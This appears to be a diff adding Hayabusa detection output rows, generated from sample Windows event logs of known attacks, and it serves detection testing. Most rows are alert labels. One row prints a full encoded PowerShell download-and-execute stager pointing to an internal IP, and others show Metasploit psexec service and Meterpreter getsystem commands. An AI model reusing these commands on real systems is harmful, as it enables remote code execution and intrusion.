+2016-09-21 04:19:26.637 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x98c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:19:26.903 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc JABXAGMAPQBOAGUAdwAtAE8AQgBKAEUAQwBUACAAUwB5AFMAdABFAG0ALgBOAEUAVAAuAFcAZQBCAEMAbABJAGUATgB0ADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAVwBDAC4ASABlAGEAZABFAHIAUwAuAEEAZABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AWABZACAAPQAgAFsAUwBZAFMAVABFAG0ALgBOAGUAdAAuAFcAZQBiAFIARQBxAHUAZQBzAHQAXQA6ADoARABFAGYAQQB1AGwAdABXAGUAYgBQAFIATwBYAHkAOwAkAHcAQwAuAFAAcgBvAFgAeQAuAEMAcgBlAGQARQBOAFQASQBBAEwAUwAgAD0AIABbAFMAWQBzAFQAZQBNAC4ATgBlAFQALgBDAFIAZQBEAGUAbgB0AGkAQQBMAEMAQQBjAGgAZQBdADoAOgBEAGUARgBBAFUAbAB0AE4AZQB0AHcAbwByAEsAQwBSAEUAZABlAG4AVABJAGEAbABTADsAJABLAD0AJwApADAAZABoAEMAeQAxAEoAOQBzADMAcQBZAEAAJQBMACEANwBwAHUAXQBUAHwAdgBWAH0AdABuAFsAQQBRAFIAJwA7ACQAaQA9ADAAOwBbAEMASABBAHIAWwBdAF0AJABCAD0AKABbAGMASABhAHIAWwBdAF0AKAAkAFcAYwAuAEQAbwB3AG4ATABvAGEARABTAHQAUgBpAG4ARwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQA5ADgALgAxADQAOQA6ADgAMAA4ADIALwBpAG4AZABlAHgALgBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAGIAWABPAHIAJABLAFsAJABJACsAKwAlACQASwAuAEwARQBuAEcAdABoAF0AfQA7AEkARQBYACAAKAAkAEIALQBqAG8AaQBOACcAJwApAA== | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x11c | User: IEUser | LID: 0x6793c,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:19:26.918 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7d0 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:20:19.153 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc50 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 12:40:37.088 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx
+2016-09-21 12:40:41.865 +09:00,IE10Win7,104,high,Evas,System Log File Cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
+2016-09-21 12:41:02.542 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
+2016-09-21 12:41:02.542 +09:00,IE10Win7,7045,info,,New Service Installed,Name: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
+2016-09-21 12:41:02.542 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
+2016-09-21 12:41:13.070 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
+2016-09-21 12:41:13.070 +09:00,IE10Win7,7045,info,,New Service Installed,Name: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
+2016-09-21 12:41:13.070 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
+2016-09-21 12:41:13.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Path: C:\Windows\System32\cmd.exe | PID: 0x694 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx
+2016-09-21 12:41:13.078 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Path: C:\Windows\System32\cmd.exe | PID: 0x694 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleMeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx
+2017-06-10 04:21:26.968 +09:00,2016dc.hqcorp.local,4794,high,Persis,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/4794_DSRM_password_change_t1098.evtx
+2017-06-13 08:39:43.512 +09:00,2012r2srv.maincorp.local,4765,medium,Persis | PrivEsc,Addition of SID History to Active Directory Object,,rules/sigma/builtin/security/win_susp_add_sid_history.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4765_sidhistory_add_t1178.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:32:13.803 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:40:20.569 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:40:27.201 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:37.559 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:50.476 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:43:05.021 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:43:18.017 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:44:35.127 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:44:48.428 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:47:01.705 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:47:15.018 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:49:18.983 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:49:32.379 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:11:27.669 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:11:41.506 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.254 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.254 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.258 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.258 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.262 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.262 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.266 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.266 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.271 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.271 +09:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.271 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.276 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.276 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.279 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.280 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.296 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.296 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.296 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,low,Evas,Use Remove-Item to Delete File,,rules/sigma/powershell/powershell_script/posh_ps_remove_item_path.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:18:01.084 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:37.536 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:23:59.512 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:25:40.262 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:27:04.659 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:56:34.470 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:58:22.516 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:59:31.974 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
